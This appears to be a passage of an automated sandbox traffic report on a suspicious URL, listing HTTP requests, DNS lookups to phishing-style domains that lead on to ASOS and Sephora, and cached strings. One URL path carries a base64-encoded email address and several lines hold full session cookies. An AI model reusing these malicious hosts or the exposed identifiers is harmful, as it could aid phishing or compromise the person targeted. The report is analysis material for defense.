Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=ZxrFJQAAAFqFsAN- HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=16215612898763276402808192961366232505; dpm=16215612898763276402808192961366232505
Source: global trafficHTTP traffic detected: GET /js/19181552552.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /client_storage/a19065870423.html HTTP/1.1Host: a19065870423.cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b/ss/asoscomprod/1/JS-2.1.0/s74936239296110?AQB=1&ndh=1&pf=1&t=24%2F9%2F2024%2018%3A7%3A20%204%20240&mid=16517622310589015242779979940996246389&aamlh=6&ce=UTF-8&ns=asos&pageName=desktop%20com%7Chome%20page%7Chome&g=https%3A%2F%2Fwww.asos.com%2F&r=https%3A%2F%2Ffkmd.lioninkey.com%2F&ch=home%20page%20&server=desktop%20com&events=event128%3D-1729807628574%2Cevent121%2Cevent79&aamb=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&c1=home&v1=1&c2=home&c3=home&c5=2024-10-24T22%3A07%3A20.097Z&v6=home&c8=home&c11=https%3A%2F%2Fwww.asos.com%2F&v17=New&v19=1280%3A907&v29=1284&v30=-1729807628574&c39=mw%20brand%201%2Cmw%20brand%202%2Cmw%20brand%203%2Cmw%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cshop%20mw%20brands%20cta%2Cshop%20ww%20brands%20cta%2Cfeature%201%2Cfeature%202%2Cfeature%203%2Cfeature%204%2Chero%2Cthe%20biggest%20labels%20title%2Cwomens%20categories%20title%2Cww%20uk%20seo%20links%2Cmens%20categories%20title%2Cmw%20uk%20seo%20links%2C&v60=home&v61=home&v112=gb&v113=gbp&v137=7fcd9f7c2a2243efacee66acc7d8a733&v225=1&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&AQE=1 HTTP/1.1Host: metrics.asos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; RT="z=1&dm=asos.com&si=2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd&ss=m2nussgu&sl=0&tt=0&bcn=%2F%2F684dd329.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; s_ecid=MCMID%7C16517622310589015242779979940996246389; keyStoreDataversion=mhabj1f-41; browseCountry=GB; asos-anon12=0192c091e60e7a4695759c14c2bfe766; asos-ts121=0192c091-e60f-781f-a379-115ecb8dc377; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20visitCount%3D1%7C1729809432866%3B%20s_invisit%3Dtrue%7C1729809440086%3B%20s_nr%3D1729807640088-New%7C1761343640088%3B%20gpv_p10%3Ddesktop%2520com%257Chome%2520page%257Chome%7C1729809440090%3B%20gpv_p6%3D%2520%7C1729809440092%3B%20gpv_e47%3Dhome%7C1729809440095%3B; _
Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://a19065870423.cdn.optimizely.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://a19065870423.cdn.optimizely.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b/ss/asoscomprod/1/JS-2.1.0/s74936239296110?AQB=1&ndh=1&pf=1&t=24%2F9%2F2024%2018%3A7%3A20%204%20240&mid=16517622310589015242779979940996246389&aamlh=6&ce=UTF-8&ns=asos&pageName=desktop%20com%7Chome%20page%7Chome&g=https%3A%2F%2Fwww.asos.com%2F&r=https%3A%2F%2Ffkmd.lioninkey.com%2F&ch=home%20page%20&server=desktop%20com&events=event128%3D-1729807628574%2Cevent121%2Cevent79&aamb=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&c1=home&v1=1&c2=home&c3=home&c5=2024-10-24T22%3A07%3A20.097Z&v6=home&c8=home&c11=https%3A%2F%2Fwww.asos.com%2F&v17=New&v19=1280%3A907&v29=1284&v30=-1729807628574&c39=mw%20brand%201%2Cmw%20brand%202%2Cmw%20brand%203%2Cmw%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cww%20brand%201%2Cww%20brand%202%2Cww%20brand%203%2Cww%20brand%204%2Cshop%20mw%20brands%20cta%2Cshop%20ww%20brands%20cta%2Cfeature%201%2Cfeature%202%2Cfeature%203%2Cfeature%204%2Chero%2Cthe%20biggest%20labels%20title%2Cwomens%20categories%20title%2Cww%20uk%20seo%20links%2Cmens%20categories%20title%2Cmw%20uk%20seo%20links%2C&v60=home&v61=home&v112=gb&v113=gbp&v137=7fcd9f7c2a2243efacee66acc7d8a733&v225=1&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&AQE=1 HTTP/1.1Host: metrics.asos.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; RT="z=1&dm=asos.com&si=2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd&ss=m2nussgu&sl=0&tt=0&bcn=%2F%2F684dd329.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; s_ecid=MCMID%7C16517622310589015242779979940996246389; keyStoreDataversion=mhabj1f-41; browseCountry=GB; asos-anon12=0192c091e60e7a4695759c14c2bfe766; asos-ts121=0192c091-e60f-781f-a379-115ecb8dc377; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20visitCount%3D1%7C1729809432866%3B%20s_invisit%3Dtrue%7C1729809440086%3B%20s_nr%3D1729807640088-New%7C1761343640088%3B%20gpv_p10%3Ddesktop%2520com%257Chome%2520page%257Chome%7C1729809440090%3B%20gpv_p6%3D%2520%7C1729809440092%3B%20gpv_e47%3Dhome%7C1729809440095%3B; _s_fpv=true; s_cc=true; featuresId=5a23a0c5-f89c-40ad-a858-29f7a5834018; asos-b-sdv629=mhabj1f-41; _abck=78BB01D303A00543970FBC58A9F5D796~-1~YAAQC/AQApXWW6+SAQAALvORwAwaFTJU4qL2Ow+pbVRxXTMLctO+GWXq/Pj/SQfDZIcK1JTs87p2nr0yuhxBJBaLkBX
Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.asos.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.asos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1Host: we4uproducts.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: we4uproducts.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://we4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cbb/lld/jjg/QmRw45kIkadMJ3AkT1hIdMvS/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20= HTTP/1.1Host: we4uproducts.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: "https://www.facebook.com/ASOS", equals www.facebook.com (Facebook)
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: "sameAs" : [ "https://www.youtube.com/asos", equals www.youtube.com (Youtube)
Source: chromecache_230.1.dr, chromecache_228.1.drString found in binary or memory: return b}nD.F="internal.enableAutoEventOnTimer";var gc=ma(["data-gtm-yt-inspected-"]),pD=["www.youtube.com","www.youtube-nocookie.com"],qD,rD=!1; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.google.co.uk
Source: global trafficDNS traffic detected: DNS query: we4uproducts.com
Source: global trafficDNS traffic detected: DNS query: fkmd.lioninkey.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.com
Source: global trafficDNS traffic detected: DNS query: www.sephora.com
Source: global trafficDNS traffic detected: DNS query: cnstrc.com
Source: global trafficDNS traffic detected: DNS query: e309da9b9aaf.cdn4.forter.com
Source: global trafficDNS traffic detected: DNS query: community.sephora.com
Source: global trafficDNS traffic detected: DNS query: js-cdn.dynatrace.com
Source: global trafficDNS traffic detected: DNS query: api.bluecore.com
Source: global trafficDNS traffic detected: DNS query: sephora-track.inside-graph.com
Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
Source: global trafficDNS traffic detected: DNS query: sephora.demdex.net
Source: global trafficDNS traffic detected: DNS query: r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ru
Source: global trafficDNS traffic detected: DNS query: www.asos.com
Source: global trafficDNS traffic detected: DNS query: content.asos-media.com
Source: global trafficDNS traffic detected: DNS query: images.asos-media.com
Source: global trafficDNS traffic detected: DNS query: www.asos-video.com
Source: global trafficDNS traffic detected: DNS query: assets.asosservices.com
Source: global trafficDNS traffic detected: DNS query: cdn.optimizely.com
Source: global trafficDNS traffic detected: DNS query: my.asos.com
Source: global trafficDNS traffic detected: DNS query: ci.asosservices.com
Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
Source: global trafficDNS traffic detected: DNS query: creativeassets.asosservices.com
Source: global trafficDNS traffic detected: DNS query: s2.go-mpulse.net
Source: global trafficDNS traffic detected: DNS query: resources.asosservices.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: c.go-mpulse.net
Source: global trafficDNS traffic detected: DNS query: asos.demdex.net
Source: global trafficDNS traffic detected: DNS query: metrics.asos.com
Source: global trafficDNS traffic detected: DNS query: reporting.go-mpulse.net
Source: global trafficDNS traffic detected: DNS query: www.asosglobal.com
Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: a19065870423.cdn.optimizely.com
Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global trafficDNS traffic detected: DNS query: logx.optimizely.com
Source: global trafficDNS traffic detected: DNS query: geolocation.onetrust.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1007358488:1729804167:CRDzmKFIoAU4yvrVIjAbfjq9957Nm-UqDmKN-DBsI4o/8d7d45361ad96c58/ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18m HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3076sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ToaaVLDWqctN4ec2H.7xI39gx5IJZ550uqUHYZCULGM-1729807547-1.1.1.1-mgtEiPfUVuYisRVn6khwMk8R.3HNdOcjhcYByyKgmlmdNBQnct_G_8GLQIWqf18msec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/g5awn/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:05:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 11133Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTRaBsChwjRBmyPySqJSGlLkGakMO5bb1fDM0C389eXCBtQ2y0KY2F9mxlAWX%2Bf3%2FoeGcoTyl0Ce51v3WbSPXIL%2B4C7tO2zV0brwPFmaLkSALTsFL7o4fdXbyDKHxQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2002&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2268&delivery_rate=1399710&cwnd=251&unsent_bytes=0&cid=20900f748b3c6a5d&ts=16&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8d7d45411b3ebfca-ATLserver-timing: cfL4;desc="?proto=TCP&rtt=20108&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1898&delivery_rate=144022&cwnd=32&unsent_bytes=0&cid=de9af67cd5ab3c6e&ts=5325&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:05:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: ERlMQ5xhdcS2Mcxao2nO3cxCK9eXgd/c/eM=$VKJCpeDaFsfsj3iNcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7d4550fba56b0a-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:05:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: nDchZ52eeyFS0JJG/gaxwj72b04KbVGDA3I=$KxLznNBMoMXCWl1aServer: cloudflareCF-RAY: 8d7d45669e0b486b-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:05:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Y1JTP17OIgEMbiXDKPGYRSTZiMBlh1VVC0U=$SUwJ4dho+hONmpyOcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7d4580c8403ac6-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:06:46 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: gPIWXw2al7IrMMO3WDzVioz9y3wciJ40iU8=$S+wSW+dBCzYkR7M1Server: cloudflareCF-RAY: 8d7d46a24e8de80f-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:06:49 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: J3Yw7at9e7w+2BvS1j5q18Kp5GY4A7l/rZo=$4ZSlWyEgDskXZQLncache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7d46b899c04635-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:07:08 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: StWP1JpMRlUcJXPSVDnpzlv23DgTHzhHo5Y=$BYGQ2QBVaj73bA2tcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8d7d472b483f3171-DFWalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 22:05:42 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: chromecache_169.1.drString found in binary or memory: http://schema.org
Source: chromecache_228.1.drString found in binary or memory: https://ad.doubleclick.net
Source: chromecache_228.1.drString found in binary or memory: https://ade.googlesyndication.com
Source: chromecache_228.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://app.optimizely.com/js/innie.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com
Source: chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/asos-ui/manifest/windowManifest.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/asos-ui/sdk/bag-sdk-9.0.0.min.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/asos-ui/sdk/saved-items-sdk.iife.48b6fe50.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/asos-ui/web-request/browser.es5.defc2d72.js
Source: chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/LICENSE.txt
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/bold.11074381.woff2
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/bold.11074381.woff2)
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/book.1bb391ee.woff2
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/book.1bb391ee.woff2)
Source: chromecache_164.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/creative.1fc777b4.woff2)
Source: chromecache_164.1.drString found in binary or memory: https://assets.asosservices.com/fonts/futura-pt/creativeBold.1f9423cd.woff2)
Source: chromecache_207.1.dr, chromecache_240.1.drString found in binary or memory: https://assets.asosservices.com/productpg/pdp.spritesheet-195ad2bf.svg)
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/shared/jquery.742e47af.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/shared/require.7c30e08a.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/shared/uuid.76892287.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/client.newrelicclient.b259fc7924b4379328f1.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/client.sitechrome.b41df99c18eb4328a7b6.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/client.sitechrome.deferred.13c30ac023f768c61047.
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/client.sitechrome.deferred.1897f5341c56d1e99fd5.
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/client.sitechrome.styles.5e1a24317184f1ea8c00.cs
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/client.sitechrome.styles.b9d17db11b52ff8009cc.js
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/cookieScript.2d2fd467.inlined.js.map
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/newRelicSettingsScript.7ad45646.inlined.js.map
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/nonCriticalStylesheetLoader.2c3638e0.inlined.js.
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/oneTrust/13.0.0-6ca9c0c7-69/scripttemplates/otSD
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/palette.8d34b5bdde.css.map
Source: chromecache_160.1.dr, chromecache_169.1.drString found in binary or memory: https://assets.asosservices.com/sitechromepublisher/translations.251ba614b8a464ef71b8.js
